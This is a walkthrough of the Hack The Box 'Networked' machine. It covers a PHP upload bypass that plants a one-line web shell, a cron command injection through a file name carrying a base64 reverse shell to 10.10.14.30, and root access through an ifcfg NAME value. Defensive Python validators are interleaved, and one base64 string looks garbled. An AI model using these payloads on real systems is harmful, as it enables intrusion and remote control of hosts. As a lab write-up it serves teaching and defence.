Hi all! In today’s post we will be going over the Networked machine from Hack The Box, which includes some source code review (white-box approach), something I enjoy doing, so let’s get started!

1) First, kicking off with an Nmap scan:

nmap -sC -sV -A -T4 <TARGET_IP>

2) Not much is going on, so let’s get straight to business and enumerate the website.

2.1) The website is pretty basic, with nothing interesting on the home page, so I decided to start with directory and subdomain enumeration:

2.2) For directory busting I used dirsearch:

dirsearch -u http://networked.htb

2.3) Among all the findings from dirsearch, backup looked the most interesting to me, and navigating to /backup automatically downloads a backup zip file. Let’s unzip it:

2.4) Cool, we have some code to review, so let’s do it! I will use VS Code, as I like that IDE.

2.4.1) Starting off with index.html, here we can see an interesting comment that the gallery and upload features are not linked:

2.4.2) The gallery is actually photos.php, which is supposed to render the photos from user uploads:

2.4.3) The upload feature sounds more interesting to me, because if it is not properly secured we can upload a malicious PHP file (since the app is written in PHP) and thus get RCE. Let’s enumerate it. UI-wise it is very simple:

2.4.4) But let’s see what the code has to say:

From here we can see that the first check is on the file type; the function for that is check_file_type, which originates from lib.php. Also, from the screenshot below, we can see that uploaded files end up in the /uploads folder (important to remember, as that is where we can check whether we managed to bypass the upload checks and execute arbitrary PHP code).

2.4.5) Okay, so we know that the first check is a MIME check. Let’s see if we have something else to bypass, and we do! The file extension is being checked as well:

2.4.6) Okay, so far so good. Here is my thought process:

2.4.6.1) If we upload test.txt, that will fail because it is neither an image nor does it have a valid extension.

2.4.6.2) If we upload test.txt.jpg, that will also fail the MIME type check, as it is not an image, but it will satisfy the second check, which is about the file extension. This is also known as a double extension bypass.

2.4.6.3) But what if we make use of Burp, create a shell.php.png, intercept the request, and smuggle a PHP payload in between the PNG magic bytes? That should bypass this check. This is also known as a MIME bypass file upload vulnerability. Let’s see how we can do that.

2.5) First, upload an image of your choice. Then send that request from Burp’s HTTP history to Repeater. Delete most of the bytes from the middle, but leave some at the beginning and at the end: those are what let us bypass the MIME check, since the server will think this is a regular image. In the space you freed up in the middle, smuggle the PHP payload; in this case I used a simple PHP web shell:

<?php system($_GET['cmd']); ?>

### Notice how I am using a double extension to bypass the second check, and then I smuggled PHP in the middle, so we bypassed the MIME check as well. ###
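The two checks described above (magic bytes at the start of the file, an allowed extension at the end of the name) both look only at the edges of the upload, which is exactly why content placed in the middle gets through. Below is an added example, written for this post in Python rather than the app’s PHP and not taken from the box or the writeup: it builds a minimal valid PNG, produces a tampered copy whose middle bytes are replaced by a harmless placeholder string, and runs both a naive edge check and a structural check (walking every chunk and verifying its CRC) over them. The function names and the sample files are constructed for the example.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Length, type, data, CRC over type+data, as the PNG format lays them out."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_minimal_png() -> bytes:
    """A valid 1x1 grayscale PNG (constructed sample): IHDR, IDAT, IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    scanline = b"\x00\x00"  # filter type 0, then one 8-bit pixel
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(scanline)) + _chunk(b"IEND", b""))


def tampered_png() -> bytes:
    """Keep the first 16 bytes and the IEND chunk, replace everything in between
    (constructed). The placeholder stands in for whatever bytes were smuggled in."""
    good = build_minimal_png()
    return good[:16] + b"<placeholder bytes that are not PNG chunks>" + good[-12:]


def naive_check(filename: str, data: bytes) -> bool:
    """Mirrors the two checks the post describes: magic bytes plus the last extension."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return data.startswith(PNG_SIGNATURE) and ext in ALLOWED_EXT


def structural_check(data: bytes) -> bool:
    """Walk every chunk, verify its CRC, and require an IHDR...IEND chain with
    nothing trailing. Foreign bytes in the middle break the chain."""
    if not data.startswith(PNG_SIGNATURE):
        return False
    pos = len(PNG_SIGNATURE)
    seen_ihdr = False
    while pos + 12 <= len(data):
        length = struct.unpack(">I", data[pos:pos + 4])[0]
        ctype = data[pos + 4:pos + 8]
        body = data[pos + 8:pos + 8 + length]
        crc = data[pos + 8 + length:pos + 12 + length]
        if len(body) != length or len(crc) != 4:
            return False  # truncated chunk
        if struct.unpack(">I", crc)[0] != (zlib.crc32(ctype + body) & 0xFFFFFFFF):
            return False  # CRC mismatch: bytes were altered or are not a chunk at all
        if ctype == b"IHDR":
            seen_ihdr = True
        if ctype == b"IEND":
            return seen_ihdr and pos + 12 + length == len(data)
        pos += 12 + length
    return False  # ran out of data before IEND


if __name__ == "__main__":
    for label, name, blob in (("clean", "photo.png", build_minimal_png()),
                              ("tampered", "shell.php.png", tampered_png())):
        print(f"{label:8} naive={naive_check(name, blob)} structural={structural_check(blob)}")
```

The tampered file passes the naive check and fails the structural one. The structural check is still not a sufficient defence on its own, since a well-formed PNG can carry arbitrary bytes in its ancillary chunks; the durable fixes are to re-encode the image with an image library, store it under a server-generated name, and configure the web server so that nothing in the upload directory is ever executed as PHP.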

2.6) Okay, we know that our uploaded files end up in /uploads. Navigate there and pass ?cmd=whoami in the URL bar, and we should get code execution:

2.7) Cool! We see apache being returned in the response, so now it’s time to get a reverse shell so we can continue with rooting this box. After some failed attempts I decided to go with a Python reverse shell, first checking that Python is installed in order to do so:

2.8) Next, the payload; I used revshell.com for this one:

2.9) And bingo, we got a reverse shell:

3) Since I know that Python is installed, I will use it to get a more stable TTY shell:

python -c 'import pty; pty.spawn("/bin/bash")'

3.1) Upon some enumeration I found a cron job in Guly’s directory. I again used VS Code, as it’s much easier to read through the code that way:

3.2) Okay, so here is what is happening and why the code snippet is vulnerable to OS command injection. First, the script creates an empty array named files and then loops over each file name in the /uploads directory. If the file name is index.html, nothing happens; otherwise the script deletes it, and the problem is that it uses exec to do so. The exec call uses a user-controlled value, $value, since we can create a file with any name inside the uploads directory. With that being said, we can create malicious file names, such as this one:

In addition to this, we need an injection operator to introduce a new OS command within the exec command; for that I chose the ; character.

So the final file name should be:

evil;echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMzAvNTU1NSAwPiYxËg=
base64 -d | bash ---> we are decoding our payload and then executing it with bash!

The base64-encoded payload is actually:

"sh -i >& /dev/tcp/10.10.14.30/5555 0>&1"

I had to base64-encode it because characters like / and > won’t work within the file name:

So, based on the source code, the final command will look like this:

exec("nohup /bin/rm -f /var/www/html/uploads/evil;echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMzAvNTU1NSAwPiYxËg=
base64 -d | bash > /dev/null 2>&1 &");

where /var/www/html/uploads is $path and $value is our malicious file name, which the shell interprets as an additional OS command and executes after the first one (we effectively break out of the intended command). Start a netcat listener and we get a shell as Guly, because this cron job runs under his account:
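The root cause in the cron script is that a file name the uploader controls is pasted into a command string that a shell then parses. The added example below is mine, written in Python rather than the script’s PHP and not the box’s code: it contrasts the string the vulnerable pattern builds with a properly quoted one (shlex.quote being the Python counterpart of PHP’s escapeshellarg), performs the cleanup without a shell at all, and adds an allowlist for file names that a defender can use to audit the upload directory. The temporary directory, the file names and the helper names are constructed for the example; the command strings are only built and printed, never run.

```python
import os
import re
import shlex
import tempfile

# Allowlist for names the app itself should generate; anything else in /uploads is suspect.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(png|jpg|jpeg|gif)$")
UPLOAD_PATH = "/var/www/html/uploads"  # path from the post; only used to build strings here


def vulnerable_command(name: str) -> str:
    """The string the cron script's exec() pattern builds. Built here, never executed."""
    return f"nohup /bin/rm -f {UPLOAD_PATH}/{name} > /dev/null 2>&1 &"


def quoted_command(name: str) -> str:
    """Same command with the path passed as one quoted argument, so the shell
    sees a single word no matter what the name contains."""
    return f"nohup /bin/rm -f {shlex.quote(os.path.join(UPLOAD_PATH, name))} > /dev/null 2>&1 &"


def is_safe_upload_name(name: str) -> bool:
    """True only for names matching the allowlist; a ';', a space or a second
    extension can never pass."""
    return bool(SAFE_NAME.match(name))


def cleanup_uploads(upload_dir: str, keep=("index.html",)) -> list:
    """What the cron job intends, done without a shell: os.remove treats the
    name purely as data, so there is nothing to inject into."""
    removed = []
    for entry in os.listdir(upload_dir):
        if entry in keep:
            continue
        target = os.path.join(upload_dir, entry)
        if os.path.isfile(target) and not os.path.islink(target):
            os.remove(target)
            removed.append(entry)
    return sorted(removed)


def demo() -> dict:
    """Run the shell-free cleanup over a constructed directory holding a hostile name."""
    hostile = "evil;echo injected"  # constructed stand-in for the post's file name
    with tempfile.TemporaryDirectory() as d:
        for n in ("index.html", "upload_1.png", hostile):
            open(os.path.join(d, n), "w").close()
        removed = cleanup_uploads(d)
        remaining = sorted(os.listdir(d))
    return {"removed": removed, "remaining": remaining,
            "hostile_flagged": not is_safe_upload_name(hostile)}


if __name__ == "__main__":
    print(vulnerable_command("evil;echo injected"))
    print(quoted_command("evil;echo injected"))
    print(demo())
```

In the PHP original the equivalent fixes are unlink() on the joined path instead of exec(), or at minimum escapeshellarg() around the path; the allowlist is the extra layer that makes a name like the one in this post show up in an audit even if it somehow lands on disk.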

4) Cool, we got user.txt! The first check I always make when going for root.txt is sudo -l, and this time was no exception:

4.1) Okay, another script. Let’s see what it does. I didn’t get much out of it just by looking at it, nor after executing it, but what I picked up is the file the cat command reads -> ifcfg-guly. I decided to do more research on it, and HackTricks has us covered:

4.2) Okay, so from here I can see that ifcfg files are used for network configuration. Since running changeme.sh lets me modify the ifcfg file, that means we can pwn the system. Let’s do it!

I simply placed /bin/bash as the NAME and we got a shell as root. A very cool privilege escalation path. GG!
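Because ifcfg-* files are sourced by the network scripts as shell assignments, any value that is not one plain token (whitespace, quotes, slashes, metacharacters) is what to look for when auditing a host like this one. The added example below is mine, in Python, and not from the box, HackTricks or the writeup: it parses a constructed ifcfg file and flags such values. The key and value patterns are my assumptions about what legitimate entries look like, not a specification of the format.

```python
import re

# A legitimate value here is one plain shell word: letters, digits and the few
# punctuation characters seen in device names, MACs and addresses. No whitespace,
# no quotes, no slashes, no metacharacters (assumption for this example, not a spec).
PLAIN_TOKEN = re.compile(r"^[A-Za-z0-9_.:-]*$")
SHELL_IDENT = re.compile(r"^[A-Z_][A-Z0-9_]*$")

SAMPLE_IFCFG = """\
# constructed sample, modelled on a RHEL/CentOS-style ifcfg file
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
HWADDR=00:11:22:33:44:55
NAME=guly0 /bin/bash
PROXY_METHOD=none
"""


def parse_ifcfg(text: str) -> dict:
    """KEY=VALUE per line; blanks and comments skipped. Quotes are deliberately not
    stripped, because a quote inside a value is itself worth flagging."""
    values = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        values[key.strip()] = value.strip()
    return values


def audit_ifcfg(text: str) -> list:
    """Return (key, value, reason) for every entry the network scripts could
    misinterpret when they source the file."""
    findings = []
    for key, value in parse_ifcfg(text).items():
        if not SHELL_IDENT.match(key):
            findings.append((key, value, "key is not a plain shell identifier"))
        elif not PLAIN_TOKEN.match(value):
            findings.append((key, value, "value is not a single plain token"))
    return findings


if __name__ == "__main__":
    for key, value, reason in audit_ifcfg(SAMPLE_IFCFG):
        print(f"{key}={value!r}: {reason}")
```

On the constructed sample only the NAME line is reported. The same logic belongs in whatever script is allowed to write these files: if a value does not match the token pattern, refuse to write it rather than letting a sourcing shell decide what it means.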

Lessons Learned

1) While analyzing the code, I learned some PHP syntax I didn’t know before, while trying to reproduce both vulnerabilities, the file upload and the command injection, locally.

2) I definitely learned about network configuration files and their format, such as ifcfg, and how, if not properly secured, they can lead to privilege escalation. Overall a great machine!
